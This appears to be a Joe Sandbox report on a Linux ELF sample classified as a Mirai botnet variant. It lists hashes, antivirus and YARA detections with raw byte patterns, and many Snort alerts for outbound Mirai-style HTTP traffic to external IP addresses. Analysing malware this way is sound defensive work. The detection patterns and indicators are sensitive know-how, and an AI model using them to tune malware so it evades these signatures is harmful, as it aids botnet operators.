Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
t0X9iGR3pD.elf

Overview

General Information

Sample name:t0X9iGR3pD.elf
renamed because original name is a hash value
Original sample name:a5d66c117a66fe86e146c1ec3022a091.elf
Analysis ID:1391985
MD5:a5d66c117a66fe86e146c1ec3022a091
SHA1:96a7683d920e713f37f2f31ecb7e1d84d1c6c603
SHA256:a14b2f7634316eaa99dc1a443e67c484a7fee497dac6bd6d47377e232235c393
Tags:32elfintelmirai
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Machine Learning detection for sample
Sample tries to kill multiple processes (SIGKILL)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1391985
Start date and time:2024-02-14 09:31:42 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 43s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:t0X9iGR3pD.elf
renamed because original name is a hash value
Original Sample Name:a5d66c117a66fe86e146c1ec3022a091.elf
Detection:MAL
Classification:mal100.spre.troj.linELF@0/0@2/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.

Runtime Messages

Command:/tmp/t0X9iGR3pD.elf
PID:5576
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Infected By Cult
Standard Error:

Process Tree

  • system is lnxubuntu20
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
t0X9iGR3pD.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
  • 0x7930:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
t0X9iGR3pD.elfLinux_Trojan_Mirai_88de437funknownunknown
  • 0xc8d2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
t0X9iGR3pD.elfLinux_Trojan_Mirai_ae9d0fa6unknownunknown
  • 0x192:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
t0X9iGR3pD.elfLinux_Trojan_Mirai_389ee3e9unknownunknown
  • 0xf400:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
t0X9iGR3pD.elfLinux_Trojan_Mirai_cc93863bunknownunknown
  • 0xdec9:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
Click to see the 1 entries

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    5578.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
    • 0x7930:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
    5578.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Mirai_88de437funknownunknown
    • 0xc8d2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
    5578.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Mirai_ae9d0fa6unknownunknown
    • 0x192:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
    5578.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Mirai_389ee3e9unknownunknown
    • 0xf400:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
    5578.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Mirai_cc93863bunknownunknown
    • 0xdec9:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
    Click to see the 13 entries

    Snort Signatures

    Timestamp:192.168.2.14112.124.183.7237314802839471 02/14/24-09:33:19.622889
    SID:2839471
    Source Port:37314
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.146.101.18457878802839471 02/14/24-09:33:25.740961
    SID:2839471
    Source Port:57878
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.221.134.9738296802839471 02/14/24-09:33:35.353060
    SID:2839471
    Source Port:38296
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.111.248.6455006802839471 02/14/24-09:32:45.430111
    SID:2839471
    Source Port:55006
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.216.102.15556426802839471 02/14/24-09:33:16.622756
    SID:2839471
    Source Port:56426
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.93.245.9839808802839471 02/14/24-09:33:32.495798
    SID:2839471
    Source Port:39808
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.211.22.14151180802839471 02/14/24-09:33:40.464627
    SID:2839471
    Source Port:51180
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.221.195.19742968802839471 02/14/24-09:32:45.021096
    SID:2839471
    Source Port:42968
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.100.79.21037920802839471 02/14/24-09:32:45.409571
    SID:2839471
    Source Port:37920
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.46.40.15643902802839471 02/14/24-09:33:25.029224
    SID:2839471
    Source Port:43902
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.102.200.15943658802839471 02/14/24-09:33:10.482052
    SID:2839471
    Source Port:43658
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.15.125.653170802839471 02/14/24-09:33:22.436208
    SID:2839471
    Source Port:53170
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.17.24241026802839471 02/14/24-09:33:37.278164
    SID:2839471
    Source Port:41026
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.98.24.22748320802839471 02/14/24-09:32:45.009997
    SID:2839471
    Source Port:48320
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.90.157.13354858802839471 02/14/24-09:33:21.683376
    SID:2839471
    Source Port:54858
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.166.123.15936188802839471 02/14/24-09:33:21.646574
    SID:2839471
    Source Port:36188
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.192.43.22057940802839471 02/14/24-09:33:13.401234
    SID:2839471
    Source Port:57940
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.218.17.10444462802839471 02/14/24-09:33:35.366865
    SID:2839471
    Source Port:44462
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.175.103.6660786802839471 02/14/24-09:32:45.048692
    SID:2839471
    Source Port:60786
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.179.198.4059870802839471 02/14/24-09:33:13.373982
    SID:2839471
    Source Port:59870
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.100.51.14059090802839471 02/14/24-09:33:40.050023
    SID:2839471
    Source Port:59090
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.110.166.8849384802839471 02/14/24-09:33:40.283662
    SID:2839471
    Source Port:49384
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.196.149.11043630802839471 02/14/24-09:33:24.630908
    SID:2839471
    Source Port:43630
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.81.91.1847370802839471 02/14/24-09:33:22.654676
    SID:2839471
    Source Port:47370
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.60.23.22235182802839471 02/14/24-09:33:22.821255
    SID:2839471
    Source Port:35182
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.216.224.9960432802839471 02/14/24-09:33:30.668287
    SID:2839471
    Source Port:60432
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.221.195.19743010802839471 02/14/24-09:32:45.008597
    SID:2839471
    Source Port:43010
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.100.55.23041314802839471 02/14/24-09:33:37.272130
    SID:2839471
    Source Port:41314
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.173.96.22659738802839471 02/14/24-09:33:25.706341
    SID:2839471
    Source Port:59738
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.100.219.5136738802839471 02/14/24-09:33:30.002042
    SID:2839471
    Source Port:36738
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.198.209.1443224802839471 02/14/24-09:33:22.637654
    SID:2839471
    Source Port:43224
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.166.42.21249246802839471 02/14/24-09:33:02.897027
    SID:2839471
    Source Port:49246
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.173.189.21548756802839471 02/14/24-09:32:56.039998
    SID:2839471
    Source Port:48756
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.49.54.19836392802839471 02/14/24-09:32:45.566189
    SID:2839471
    Source Port:36392
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.0.234.4246858802839471 02/14/24-09:32:45.536516
    SID:2839471
    Source Port:46858
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.99.102.15735546802839471 02/14/24-09:32:46.463578
    SID:2839471
    Source Port:35546
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.190.1857824802839471 02/14/24-09:33:27.268813
    SID:2839471
    Source Port:57824
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.100.77.17659816802839471 02/14/24-09:33:10.246405
    SID:2839471
    Source Port:59816
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.32.182.10947478802839471 02/14/24-09:33:37.588186
    SID:2839471
    Source Port:47478
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.162.247.11339040802839471 02/14/24-09:33:32.251342
    SID:2839471
    Source Port:39040
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.49.54.19836402802839471 02/14/24-09:32:45.646754
    SID:2839471
    Source Port:36402
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.100.71.6335568802839471 02/14/24-09:33:29.640737
    SID:2839471
    Source Port:35568
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.40.15357350802839471 02/14/24-09:33:10.050706
    SID:2839471
    Source Port:57350
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.217.179.12656654802839471 02/14/24-09:33:40.064625
    SID:2839471
    Source Port:56654
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.198.141.7337972802839471 02/14/24-09:32:56.210187
    SID:2839471
    Source Port:37972
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.198.244.20044710802839471 02/14/24-09:33:06.167737
    SID:2839471
    Source Port:44710
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.221.230.9854934802839471 02/14/24-09:33:13.196034
    SID:2839471
    Source Port:54934
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.111.202.3435956802839471 02/14/24-09:33:16.915796
    SID:2839471
    Source Port:35956
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.216.20.3953162802839471 02/14/24-09:33:40.289171
    SID:2839471
    Source Port:53162
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.149.199.8939654802839471 02/14/24-09:33:00.115280
    SID:2839471
    Source Port:39654
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.216.168.22646666802839471 02/14/24-09:32:56.016425
    SID:2839471
    Source Port:46666
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.221.176.14633560802839471 02/14/24-09:32:56.188364
    SID:2839471
    Source Port:33560
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.164.18.13749016802839471 02/14/24-09:33:37.255886
    SID:2839471
    Source Port:49016
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.216.74.9946370802839471 02/14/24-09:33:27.272022
    SID:2839471
    Source Port:46370
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.100.116.12451758802839471 02/14/24-09:32:45.012445
    SID:2839471
    Source Port:51758
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.221.156.5454238802839471 02/14/24-09:32:56.161099
    SID:2839471
    Source Port:54238
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.90.1347462802839471 02/14/24-09:33:40.285234
    SID:2839471
    Source Port:47462
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.220.12152122802839471 02/14/24-09:33:40.056559
    SID:2839471
    Source Port:52122
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.129.102.10750250802839471 02/14/24-09:33:27.274372
    SID:2839471
    Source Port:50250
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.250.107.1846360802839471 02/14/24-09:33:04.624887
    SID:2839471
    Source Port:46360
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.225.225.11944546802839471 02/14/24-09:33:13.452988
    SID:2839471
    Source Port:44546
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.100.77.17659798802839471 02/14/24-09:33:10.036755
    SID:2839471
    Source Port:59798
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.64.185.17440988802839471 02/14/24-09:33:27.293023
    SID:2839471
    Source Port:40988
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.132.209.940300802839471 02/14/24-09:33:27.851196
    SID:2839471
    Source Port:40300
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.162.116.16734494802839471 02/14/24-09:33:16.392983
    SID:2839471
    Source Port:34494
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.81.88.15139160802839471 02/14/24-09:33:06.169343
    SID:2839471
    Source Port:39160
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.133.239.12634350802839471 02/14/24-09:33:16.207341
    SID:2839471
    Source Port:34350
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.250.12549994802839471 02/14/24-09:33:10.035747
    SID:2839471
    Source Port:49994
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.111.239.20953390802839471 02/14/24-09:33:10.043970
    SID:2839471
    Source Port:53390
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.197.231.18751512802839471 02/14/24-09:33:10.063998
    SID:2839471
    Source Port:51512
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.226.5048214802839471 02/14/24-09:33:40.038563
    SID:2839471
    Source Port:48214
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.106.13836570802839471 02/14/24-09:33:13.603640
    SID:2839471
    Source Port:36570
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.221.135.3342228802839471 02/14/24-09:32:45.002998
    SID:2839471
    Source Port:42228
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.218.251.24842944802839471 02/14/24-09:33:00.359191
    SID:2839471
    Source Port:42944
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.200.21.15339992802839471 02/14/24-09:33:10.523734
    SID:2839471
    Source Port:39992
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.154.8545934802839471 02/14/24-09:33:10.249481
    SID:2839471
    Source Port:45934
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.15.125.653172802839471 02/14/24-09:33:21.414981
    SID:2839471
    Source Port:53172
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.213.88.18945990802839471 02/14/24-09:33:35.161080
    SID:2839471
    Source Port:45990
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.184.111.10951522802839471 02/14/24-09:33:21.276433
    SID:2839471
    Source Port:51522
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.216.146.2244594802839471 02/14/24-09:32:46.483754
    SID:2839471
    Source Port:44594
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.252.118.22657458802839471 02/14/24-09:33:10.064711
    SID:2839471
    Source Port:57458
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.141.118.16256642802839471 02/14/24-09:33:29.639952
    SID:2839471
    Source Port:56642
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.58.97.20159078802839471 02/14/24-09:33:37.347079
    SID:2839471
    Source Port:59078
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.124.41.11845400802839471 02/14/24-09:33:16.565503
    SID:2839471
    Source Port:45400
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.184.55.18148550802839471 02/14/24-09:33:16.121415
    SID:2839471
    Source Port:48550
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.173.172.15852130802839471 02/14/24-09:33:29.438613
    SID:2839471
    Source Port:52130
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.216.8.10359380802839471 02/14/24-09:33:40.290968
    SID:2839471
    Source Port:59380
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.247.113.355648802839471 02/14/24-09:32:46.507239
    SID:2839471
    Source Port:55648
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.57.64.18244896802839471 02/14/24-09:32:45.706699
    SID:2839471
    Source Port:44896
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.165.172.22653562802839471 02/14/24-09:32:56.570334
    SID:2839471
    Source Port:53562
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.6.1.21954728802839471 02/14/24-09:33:06.598272
    SID:2839471
    Source Port:54728
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.100.112.9144602802839471 02/14/24-09:32:45.432619
    SID:2839471
    Source Port:44602
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.227.11240374802839471 02/14/24-09:33:40.236932
    SID:2839471
    Source Port:40374
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.99.171.6955500802839471 02/14/24-09:33:12.980814
    SID:2839471
    Source Port:55500
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.86.103.19751132802839471 02/14/24-09:33:27.307526
    SID:2839471
    Source Port:51132
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.215.57.15750290802839471 02/14/24-09:32:45.533275
    SID:2839471
    Source Port:50290
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.216.197.13653398802839471 02/14/24-09:33:06.361974
    SID:2839471
    Source Port:53398
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.74.52.21354610802839471 02/14/24-09:33:03.933346
    SID:2839471
    Source Port:54610
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.168.45.12747720802839471 02/14/24-09:33:04.570465
    SID:2839471
    Source Port:47720
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.105.6633072802839471 02/14/24-09:33:00.088286
    SID:2839471
    Source Port:33072
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.227.22834036802839471 02/14/24-09:33:37.258884
    SID:2839471
    Source Port:34036
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.221.207.11438410802839471 02/14/24-09:33:10.483962
    SID:2839471
    Source Port:38410
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.247.182.12936306802839471 02/14/24-09:33:00.141575
    SID:2839471
    Source Port:36306
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.100.178.8856388802839471 02/14/24-09:33:40.041352
    SID:2839471
    Source Port:56388
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.197.182.9448240802839471 02/14/24-09:33:03.552227
    SID:2839471
    Source Port:48240
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.154.219.24653456802839471 02/14/24-09:33:10.228723
    SID:2839471
    Source Port:53456
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.221.224.16057252802839471 02/14/24-09:33:22.650022
    SID:2839471
    Source Port:57252
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.133.93.9050442802839471 02/14/24-09:33:00.100048
    SID:2839471
    Source Port:50442
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.217.171.3250362802839471 02/14/24-09:33:10.290032
    SID:2839471
    Source Port:50362
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.78.212.860720802839471 02/14/24-09:33:27.782146
    SID:2839471
    Source Port:60720
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.124.19.22636546802839471 02/14/24-09:33:21.370389
    SID:2839471
    Source Port:36546
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.49.54.19836416802839471 02/14/24-09:32:45.887655
    SID:2839471
    Source Port:36416
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.219.11344288802839471 02/14/24-09:33:40.281278
    SID:2839471
    Source Port:44288
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.133.238.25246020802839471 02/14/24-09:32:45.573545
    SID:2839471
    Source Port:46020
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.185.184.15844896802839471 02/14/24-09:33:35.781339
    SID:2839471
    Source Port:44896
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1488.213.229.15953566802839471 02/14/24-09:33:06.161931
    SID:2839471
    Source Port:53566
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.215.58.22048524802839471 02/14/24-09:32:55.999831
    SID:2839471
    Source Port:48524
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.14112.185.217.18946504802839471 02/14/24-09:33:27.762744
    SID:2839471
    Source Port:46504
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1495.101.151.13458272802839471 02/14/24-09:33:16.596111
    SID:2839471
    Source Port:58272
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: t0X9iGR3pD.elfAvira: detected
    Multi AV Scanner detection for submitted file
    Source: t0X9iGR3pD.elfReversingLabs: Detection: 71%
    Source: t0X9iGR3pD.elfVirustotal: Detection: 69%Perma Link
    Machine Learning detection for sample
    Source: t0X9iGR3pD.elfJoe Sandbox ML: detected

    Networking

    barindex
    Snort IDS alert for network traffic
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:42228 -> 88.221.135.33:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:48320 -> 88.98.24.227:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:43010 -> 88.221.195.197:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:51758 -> 95.100.116.124:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:42968 -> 88.221.195.197:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:60786 -> 95.175.103.66:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:37920 -> 95.100.79.210:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:55006 -> 95.111.248.64:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:44602 -> 95.100.112.91:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:50290 -> 95.215.57.157:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:46858 -> 95.0.234.42:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:36392 -> 112.49.54.198:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:46020 -> 112.133.238.252:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:44896 -> 95.57.64.182:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:36402 -> 112.49.54.198:80
